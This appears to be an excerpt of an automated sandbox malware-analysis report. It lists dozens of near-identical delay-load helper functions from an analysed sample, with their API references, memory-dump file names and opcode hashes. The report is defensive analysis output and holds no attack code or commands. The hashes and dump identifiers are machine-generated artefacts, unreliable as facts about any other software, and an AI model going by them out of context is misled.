                                              • Opcode ID: 0cb031bb5819cf19a972a733daffea44c1988b2a33c9b5b55a9721fcabb7a9b7
                                              • Instruction ID: 34af52e7245cdbf557d86daa163c79264e7f4d072d0fc1f691846e7772b00959
                                              • Opcode Fuzzy Hash: 0cb031bb5819cf19a972a733daffea44c1988b2a33c9b5b55a9721fcabb7a9b7
                                              • Instruction Fuzzy Hash: 71B012D569C240FC320C51963D03C7B030DC1C0B50730472FF004C2243E4404C401131
                                              Function 00CB4953 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                              Download Yara Rule
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CB4918
                                                • Part of subcall function 00CB4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CB5041
                                                • Part of subcall function 00CB4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CB5052
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 729efd1eeb2b6524ceb87c7a8a7dda702d5c1b1648bb59ff7b139a378bcd5746
                                              • Instruction ID: 1ca1e694fd3df3d8f1534aa9368fbbf3c7bfd08c3672382263e4ac2c12d54f03
                                              • Opcode Fuzzy Hash: 729efd1eeb2b6524ceb87c7a8a7dda702d5c1b1648bb59ff7b139a378bcd5746
                                              • Instruction Fuzzy Hash: 69B012D569C340FC320C51963E03C7B030DC1C0B50730472BF404C2243E4414E421031
                                              Function 00CB4967 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                              Download Yara Rule
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CB4918
                                                • Part of subcall function 00CB4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CB5041
                                                • Part of subcall function 00CB4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CB5052
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: a1bf79cc0f59b55a592eac880a2fe5011920afcda3b6383d9cdfce22b3dd0502
                                              • Instruction ID: 55209d5f087907584bf55c1d1dd0a85092e2a52fd3138d5d259819bd8f12ce98
                                              • Opcode Fuzzy Hash: a1bf79cc0f59b55a592eac880a2fe5011920afcda3b6383d9cdfce22b3dd0502
                                              • Instruction Fuzzy Hash: ABB012D169C141FC320C55563D03C7B030DC1C1B50730C72BF404C2283E4404C441131
                                              Function 00CB497B Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                              Download Yara Rule
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CB4918
                                                • Part of subcall function 00CB4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CB5041
                                                • Part of subcall function 00CB4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CB5052
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: ab4241accb336e092f4aea184585f1ea1af40edfa7ec892c36080bd44af1f656
                                              • Instruction ID: 64d466338b31577355f0fc0d7045bdd2cd59afc7eb768b717bd7eef6c3fc8c46
                                              • Opcode Fuzzy Hash: ab4241accb336e092f4aea184585f1ea1af40edfa7ec892c36080bd44af1f656
                                              • Instruction Fuzzy Hash: 37B012D169C140FC320C51563E03C7B030DC1C0B50730872BF404C2243E4514D4A1031
                                              Function 00CB4906 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                              Download Yara Rule
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CB4918
                                                • Part of subcall function 00CB4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CB5041
                                                • Part of subcall function 00CB4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CB5052
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 615a42b53c9aded9ee768e802522e90b9cfc8f5e294bf37427e606b959da4c2b
                                              • Instruction ID: d07b991ef68dd1cf0d253b7426f1f6fe7a4ff40712c28261af6a003460682026
                                              • Opcode Fuzzy Hash: 615a42b53c9aded9ee768e802522e90b9cfc8f5e294bf37427e606b959da4c2b
                                              • Instruction Fuzzy Hash: FDB012E169C180FC320C12523E03CBB030DC1C0B50730472BF400C1043A8425D521031
                                              Function 00CB492B Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                              Download Yara Rule
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CB4918
                                                • Part of subcall function 00CB4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CB5041
                                                • Part of subcall function 00CB4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CB5052
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: f69f651cd5d40597767a567a86f7a3cbd69d9cb2b9b0bdba757a4327f193eaa2
                                              • Instruction ID: 500da056fd8403b61665da237d3d1a22138bfad99bf225dab3e75a5cfad8282b
                                              • Opcode Fuzzy Hash: f69f651cd5d40597767a567a86f7a3cbd69d9cb2b9b0bdba757a4327f193eaa2
                                              • Instruction Fuzzy Hash: 40B012D169C240FC320C51567E03C7B031DC1C1B50730472BF404C2143E4414D421031
                                              Function 00CB4921 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                              Download Yara Rule
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CB4918
                                                • Part of subcall function 00CB4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CB5041
                                                • Part of subcall function 00CB4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CB5052
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 0462659f51a6328b41f78a754a0357770019bba6e3794a6fc9c6620d5461830c
                                              • Instruction ID: 8e4669a0ca7208d0269b1a2b765fb86ad3b6e5fd40db9f2c882a992951c7d85a
                                              • Opcode Fuzzy Hash: 0462659f51a6328b41f78a754a0357770019bba6e3794a6fc9c6620d5461830c
                                              • Instruction Fuzzy Hash: BEB012D169C340FC334C51567D03C7B031DC1C1B50730472BF004C2143E4404C801031
                                              Function 00CB493F Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                              Download Yara Rule
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CB4918
                                                • Part of subcall function 00CB4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CB5041
                                                • Part of subcall function 00CB4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CB5052
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 0cb7b5ebe9950c831248df63cb3baa71fa0692f0ea89f6096a843d3dd2daabf5
                                              • Instruction ID: 056455ba2c940195031074694cfe058156737a492f3997edc451ca6e83517e38
                                              • Opcode Fuzzy Hash: 0cb7b5ebe9950c831248df63cb3baa71fa0692f0ea89f6096a843d3dd2daabf5
                                              • Instruction Fuzzy Hash: ADB012D569C240FC320C51963D03C7B030DC1C1B50730872BF404C2243E4405C401131
                                              Function 00CB4935 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                              Download Yara Rule
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CB4918
                                                • Part of subcall function 00CB4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CB5041
                                                • Part of subcall function 00CB4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CB5052
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 6f35b501b2e0917ccd876287a48f9599bb8b232fe91d384a938ce60fbf261198
                                              • Instruction ID: bf3083024724d17bdc9839ae108eb3431bf64332cd906cad8f9bf45216dff706
                                              • Opcode Fuzzy Hash: 6f35b501b2e0917ccd876287a48f9599bb8b232fe91d384a938ce60fbf261198
                                              • Instruction Fuzzy Hash: 24B012D16AC340FC320C51567D03C7B031DC1C1B50730472FF004C2143E4404C401031
                                              Function 00CB4A07 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                              Download Yara Rule
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CB4918
                                                • Part of subcall function 00CB4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CB5041
                                                • Part of subcall function 00CB4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CB5052
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: f4514449c1d70c85d3310efc949503cdf922406f6323cbab2ec8e90385087651
                                              • Instruction ID: 5b37b35344acb96f31a5724f677b374d7bcb7aa819d9956aeb2e6e334f535ac4
                                              • Opcode Fuzzy Hash: f4514449c1d70c85d3310efc949503cdf922406f6323cbab2ec8e90385087651
                                              • Instruction Fuzzy Hash: 38B012D269C150FC320C51563D03C7B030DC1C1B507308B2BF404C6143E4404C401131
                                              Function 00CB4B8A Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                              Download Yara Rule
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CB4B3B
                                                • Part of subcall function 00CB4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CB5041
                                                • Part of subcall function 00CB4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CB5052
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 67ff1fedb377f0bd59170f82a28e84deec98b822704cf501ce11efe7595b912a
                                              • Instruction ID: 5d90631473b91f02b04355746d69a4d9d276ada753948e12e5e38597f3a7966c
                                              • Opcode Fuzzy Hash: 67ff1fedb377f0bd59170f82a28e84deec98b822704cf501ce11efe7595b912a
                                              • Instruction Fuzzy Hash: 4AB012C225C140FD314C518B1D03D77020EC0C0B10730932FF500C3243E4405C501131
                                              Function 00CB4B58 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                              Download Yara Rule
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CB4B3B
                                                • Part of subcall function 00CB4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CB5041
                                                • Part of subcall function 00CB4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CB5052
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 5c3e0d9086224bba636618bc1ebca461bfd68f719df02e02e634a61713b9bded
                                              • Instruction ID: 0c02a84aae4dab387c95ea6cd1cb38008694b02cc62b55d14c4b42db10777c94
                                              • Opcode Fuzzy Hash: 5c3e0d9086224bba636618bc1ebca461bfd68f719df02e02e634a61713b9bded
                                              • Instruction Fuzzy Hash: 7EB012C225C240BD320CA14B5D03D77020EC0C0B10730532FF100C3183E4404C941031
                                              Function 00CB4B62 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                              Download Yara Rule
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CB4B3B
                                                • Part of subcall function 00CB4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CB5041
                                                • Part of subcall function 00CB4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CB5052
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: c73c91c451f47aefbb171dce678e7f477b8871cb3131bb2e48978def06b9bdce
                                              • Instruction ID: 3dc06dc8b910cb03056ece6121fc3ea1474751f7a70f432f197ac616892d9222
                                              • Opcode Fuzzy Hash: c73c91c451f47aefbb171dce678e7f477b8871cb3131bb2e48978def06b9bdce
                                              • Instruction Fuzzy Hash: 01B012C225C140BD310C614B5E03D77020EC0C0B20730932FF200C3143E4404C521031
                                              Function 00CB4C99 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                              Download Yara Rule
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CB4C90
                                                • Part of subcall function 00CB4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CB5041
                                                • Part of subcall function 00CB4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CB5052
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: b0b98ce3c3a4b13e4783513a8c3462997a6d2cf76264812abe02411b20d55713
                                              • Instruction ID: 9f697b6e09cdd84c3319303e1c0265bac499e3dae5c73bf49f7dfbe382cbd976
                                              • Opcode Fuzzy Hash: b0b98ce3c3a4b13e4783513a8c3462997a6d2cf76264812abe02411b20d55713
                                              • Instruction Fuzzy Hash: 6AB012D126D040FC394C51661D02C77030DC1C0F11732833BF400C3143E4400C441131
                                              Function 00CB4CAD Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                              Download Yara Rule
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CB4C90
                                                • Part of subcall function 00CB4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CB5041
                                                • Part of subcall function 00CB4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CB5052
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 82126de68549ad0b50d1c471a98961527dc995d5db1d11d7a24ce5fb740c58ec
                                              • Instruction ID: 4c985be13f21afb27a12562f9e8aa58ad250b0e11d2b7960c1f0bd83cb41e5b9
                                              • Opcode Fuzzy Hash: 82126de68549ad0b50d1c471a98961527dc995d5db1d11d7a24ce5fb740c58ec
                                              • Instruction Fuzzy Hash: A9B012D126D080FC390C51561E02C77030DC1C0F21732833BF100C3143E4400C461031
                                              Function 00CB4CB7 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                              Download Yara Rule
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CB4C90
                                                • Part of subcall function 00CB4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CB5041
                                                • Part of subcall function 00CB4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CB5052
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 3cd43784d7ff388d1bc84167fea650a6d0b5923b3743ec99470c037613c326a7
                                              • Instruction ID: c6cd6e597b5106581e0b910bfbb89f4bc96800ebdfae0d3a048e08c07e4df38e
                                              • Opcode Fuzzy Hash: 3cd43784d7ff388d1bc84167fea650a6d0b5923b3743ec99470c037613c326a7
                                              • Instruction Fuzzy Hash: 3CB012D126D041FC390C51562D02D76030DC1C0F11732433BF000C3543E4400C441031
                                              Function 00CB4C7E Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                              Download Yara Rule
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CB4C90
                                                • Part of subcall function 00CB4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CB5041
                                                • Part of subcall function 00CB4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CB5052
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
